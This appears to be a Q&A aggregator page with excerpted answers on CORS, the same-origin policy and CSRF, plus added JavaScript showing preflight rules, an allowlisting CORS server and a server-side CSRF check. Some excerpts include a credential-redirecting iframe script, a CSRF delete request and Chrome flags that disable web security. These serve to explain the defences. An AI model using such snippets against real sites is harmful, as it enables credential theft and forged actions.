Why is there no preflight in CORS for POST requests with standard content-type

See What is the motivation behind the introduction of preflight CORS requests?. The reason CORS doesn’t require browsers to do a preflight for application/x-www-form-urlencoded, multipart/form-data, or text/plain content types is that if it did, that’d make CORS more restrictive than what browsers have already always allowed (and it’s not the intent of CORS to put … Read more
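The rule the answer describes can be written down as code. The following is an added example, not part of the original answer: it decides whether a browser would send an OPTIONS preflight for a given method and header set, following the Fetch standard's definitions of CORS-safelisted methods and request headers (the three form content types, the 128-byte value cap, the 1024-byte combined cap, and the "CORS-unsafe request-header byte" rule). The Range header, streaming bodies and the full MIME-type parser are left out and replaced by a simplified type/subtype comparison; those simplifications are assumptions of this example.

```javascript
// Added example, not from the original answer: would a browser preflight this
// request? Follows the Fetch standard's CORS-safelisted method / header rules.
// Assumptions: Range is ignored, bodies are not streams, and a simplified
// MIME "essence" parse (type/subtype before ';') stands in for the full parser.

const SAFELISTED_METHODS = new Set(['GET', 'HEAD', 'POST']);

// Exactly the three Content-Types an HTML <form> can already produce.
const SAFELISTED_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// Bytes permitted in Accept-Language / Content-Language values.
const LANGUAGE_VALUE_RE = /^[0-9A-Za-z *,\-.;=]*$/;

// "CORS-unsafe request-header byte": C0 controls except tab, DEL, and the
// delimiters " ( ) : < > ? @ [ \ ] { }
function hasUnsafeByte(value) {
  for (const ch of value) {
    const code = ch.codePointAt(0);
    if (code < 0x20 && code !== 0x09) return true;
    if (code === 0x7f) return true;
    if ('"():<>?@[\\]{}'.includes(ch)) return true;
  }
  return false;
}

// Is one header name/value pair CORS-safelisted?
function isSafelistedHeader(name, value) {
  if (value.length > 128) return false;            // length cap applies to all four names
  switch (name.toLowerCase()) {
    case 'accept':
      return !hasUnsafeByte(value);
    case 'accept-language':
    case 'content-language':
      return LANGUAGE_VALUE_RE.test(value);
    case 'content-type': {
      if (hasUnsafeByte(value)) return false;      // e.g. a quoted boundary parameter
      // Compare the MIME essence (type/subtype, case-insensitive), so
      // "text/plain; charset=utf-8" still counts as text/plain.
      const essence = value.split(';')[0].trim().toLowerCase();
      if (!/^[^\s/;]+\/[^\s/;]+$/.test(essence)) return false;
      return SAFELISTED_CONTENT_TYPES.has(essence);
    }
    default:
      return false;                                // X-Requested-With, Authorization, ...
  }
}

// true  -> the browser sends an OPTIONS preflight first
// false -> a "simple" request goes straight to the server, as a <form> could
function needsPreflight(method, headers = {}) {
  if (!SAFELISTED_METHODS.has(method.toUpperCase())) return true;
  let safelistValueSize = 0;
  for (const [name, value] of Object.entries(headers)) {
    if (!isSafelistedHeader(name, value)) return true;
    safelistValueSize += value.length;
  }
  // Fetch: once the safelisted values together exceed 1024 bytes they are all
  // treated as unsafe and the request is preflighted anyway.
  return safelistValueSize > 1024;
}
```

The practical consequence for a server: any endpoint that accepts a POST with one of the three form content types must already be CSRF-safe, because a cross-origin page could always have sent that request with a plain `<form>`; only requests the function above marks as needing a preflight are ones a browser will refuse to send without the server's explicit consent.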

Simple example for why Same Origin Policy is needed

    <iframe id="bank" src="https://yourbank.example"></iframe>
    <script>
    window.onload = function() {
      document.getElementById('bank').contentWindow.document.forms[0].action = 'http://example.com';
    };
    </script>

The JavaScript code changes the form’s action property (the destination, in a manner of speaking), so when you submit the form, you send your credentials to me, not your bank. If I set up a PHP script on my server that redirects … Read more

Disable-web-security in Chrome 48+

Update 2021-10-18 As of Chrome 95, on MacOS and Windows, --disable-site-isolation-trials remains a required flag in order to disable web security, so the command-line arguments to Chrome seen below are still valid. (Some of the arguments are not formally supported by Chrome, as it will warn you.) To test whether you’ve successfully launched Chrome with … Read more

How to enable CORS on Firefox

Do nothing to the browser. CORS is supported by default on all modern browsers (and since Firefox 3.5). The server being accessed by JavaScript has to give the site hosting the HTML document in which the JS is running permission via CORS HTTP response headers. security.fileuri.strict_origin_policy is used to give JS in local HTML documents … Read more
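Since the answer puts the work on the server, here is what that server side looks like. This is an added example in Node.js, not code from the original answer: a request handler that emits the CORS response headers only for an allowlisted Origin, answers preflights, and adds Vary: Origin. The origins and port are constructed for the example.

```javascript
// Added example, not from the original answer: the server half of CORS.
// The browser needs nothing changed; the server decides which origins may
// read its responses. ALLOWED_ORIGINS and port 3000 are constructed values.

const ALLOWED_ORIGINS = new Set([
  'https://app.example',
  'http://localhost:8080',
]);

// Build the CORS response headers for one request. Only an exact allowlist
// match is echoed back: reflecting whatever Origin arrives together with
// Access-Control-Allow-Credentials: true would let every site read the
// authenticated user's data, and "*" is rejected by browsers when
// credentials are included.
function corsHeaders(method, reqHeaders, allowed = ALLOWED_ORIGINS) {
  const headers = { Vary: 'Origin' };            // response depends on Origin; keep caches honest
  const origin = reqHeaders['origin'];
  if (!origin || !allowed.has(origin)) {
    return headers;                              // no ACAO header: the browser blocks the read
  }
  headers['Access-Control-Allow-Origin'] = origin;
  headers['Access-Control-Allow-Credentials'] = 'true';
  if (method === 'OPTIONS' && reqHeaders['access-control-request-method']) {
    // Preflight: state what the real request may use and let the browser cache it.
    headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, DELETE';
    headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization';
    headers['Access-Control-Max-Age'] = '600';
  }
  return headers;
}

// Route one request to a {status, headers, body} triple. A non-allowlisted
// origin still gets a 200 and a body: CORS only stops the calling page's
// JavaScript from reading the response, it does not stop the request itself.
function handle(method, reqHeaders) {
  const headers = corsHeaders(method, reqHeaders);
  const isPreflight = method === 'OPTIONS' && 'access-control-request-method' in reqHeaders;
  if (isPreflight) return { status: 204, headers, body: '' };
  headers['Content-Type'] = 'application/json';
  return { status: 200, headers, body: JSON.stringify({ ok: true }) };
}

function startServer(port) {
  const http = require('http');
  return http.createServer((req, res) => {
    // Node lower-cases incoming header names, which corsHeaders relies on.
    const { status, headers, body } = handle(req.method, req.headers);
    res.writeHead(status, headers);
    res.end(body);
  }).listen(port);
}

// Run with `node cors_server.js --serve`, then from a page on one of the
// allowed origins call fetch('http://localhost:3000/', { credentials: 'include' }).
if (process.argv.includes('--serve')) startServer(3000);
```

Browsers will only read the response if the Access-Control-Allow-Origin value matches the page's origin exactly, so the check against a fixed allowlist is the whole point; a pattern match such as "ends with .example" is a common way to accidentally admit attacker-controlled hosts.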

Why Same-origin policy isn’t enough to prevent CSRF attacks?

Summary I had misunderstood some concepts about Same-origin policy and CORS that @Bergi, @Neil McGuigan and @SilverlightFox helped me to clarify. First of all, what @Bergi says, "SOP does not prevent sending requests. It does prevent a page from accessing results of cross-domain requests.", is an important concept. I thought that a browser doesn’t … Read more

ES6 module support in Chrome 62/Chrome Canary 64, does not work locally, CORS error

Unlike regular scripts, ES6 modules are subject to same-origin policy. This means that you cannot import them from the file system or cross-origin without a CORS header (which cannot be set for local files). Basically you need to run this code from a (local) server or disable same-origin in the browser for testing (do not … Read more

same-origin policy and CORS – what’s the point?

The important thing to note here is that if the user is signed in to a site http://example.com/ and the request http://example.com/delete?id=1 deletes a post by the user, then the following code will delete the user’s post: <script src="http://example.com/delete?id=1"></script> This is called a CSRF/XSRF attack (cross-site request forgery). This is why most server-side web … Read more
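Both this answer and the one above it make the same point: the same-origin policy does not stop the cross-site request from being sent, so the server has to distinguish requests its own pages made from ones an attacker's page triggered. The following is an added example, not code from either answer, of a server-side check that rejects the `<script src="http://example.com/delete?id=1">` request: it refuses GET for state-changing endpoints (the design flaw that makes that attack possible at all), then applies a resource-isolation policy on the Fetch Metadata request headers (Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest), with the Origin header as the fallback for browsers that do not send them. The site origin and the sample requests are constructed for the example.

```javascript
// Added example, not from the original answers: server-side CSRF check built
// on Fetch Metadata, with Origin as a fallback. SITE_ORIGIN is a constructed
// value; header objects are expected with lower-cased names as Node provides.

const SITE_ORIGIN = 'https://example.com';

// Returns true if the request may proceed, false if it should get a 403.
// stateChanging: true for endpoints like /delete?id=1 that modify data.
function isAllowedRequest(method, headers, { stateChanging = false, siteOrigin = SITE_ORIGIN } = {}) {
  const m = method.toUpperCase();

  // Rule 0: state-changing endpoints never accept GET/HEAD. A <script src>,
  // <img src> or plain link can only produce GET, so this alone defeats the
  // attack in the answer above.
  if (stateChanging && (m === 'GET' || m === 'HEAD')) return false;

  const site = headers['sec-fetch-site'];
  const mode = headers['sec-fetch-mode'];
  const dest = headers['sec-fetch-dest'];

  if (site !== undefined) {
    // The browser supplied Fetch Metadata: apply a resource-isolation policy.
    // 'none' means user-initiated (address bar, bookmark), not another site.
    if (site === 'same-origin' || site === 'same-site' || site === 'none') return true;
    // Allow cross-site top-level navigations (someone clicked a link to us),
    // but only as GET and not when we are being embedded via <object>/<embed>.
    if (mode === 'navigate' && m === 'GET' && dest !== 'object' && dest !== 'embed') return true;
    // Everything else from another site: <script src>, <img>, fetch(), form POST.
    return false;
  }

  // Older browser without Fetch Metadata: fall back to Origin, which browsers
  // attach to cross-origin requests and to POST/PUT/DELETE.
  const origin = headers['origin'];
  if (origin !== undefined) return origin === siteOrigin;

  // No signal at all. Safe methods may proceed; a state-changing request with
  // neither header is rejected here (conservative choice; a per-session
  // anti-CSRF token, not shown, is the usual way to admit such clients).
  return m === 'GET' || m === 'HEAD' || m === 'OPTIONS';
}

// Constructed sample requests, as a browser would send them.
const SAMPLE_REQUESTS = {
  // <script src="http://example.com/delete?id=1"> on an attacker's page
  scriptFromOtherSite: ['GET', { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'script' }],
  // fetch('/delete', { method: 'POST' }) from our own page
  ownPagePost: ['POST', { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty' }],
  // user clicks a link to us from another site
  linkFromOtherSite: ['GET', { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'document' }],
  // auto-submitted <form method="POST"> on an attacker's page
  formPostFromOtherSite: ['POST', { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'document' }],
};

function checkSample(name, opts) {
  const [method, headers] = SAMPLE_REQUESTS[name];
  return isAllowedRequest(method, headers, opts);
}
```

Pair this with session cookies marked SameSite=Lax (or Strict), so that the cookie is not even attached to the cross-site `<script>` or form-POST requests in the first place; the check above then covers browsers and paths where the cookie attribute does not apply.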

Error!: SQLSTATE[HY000] [1045] Access denied for user 'divattrend_liink'@'localhost' (using password: YES)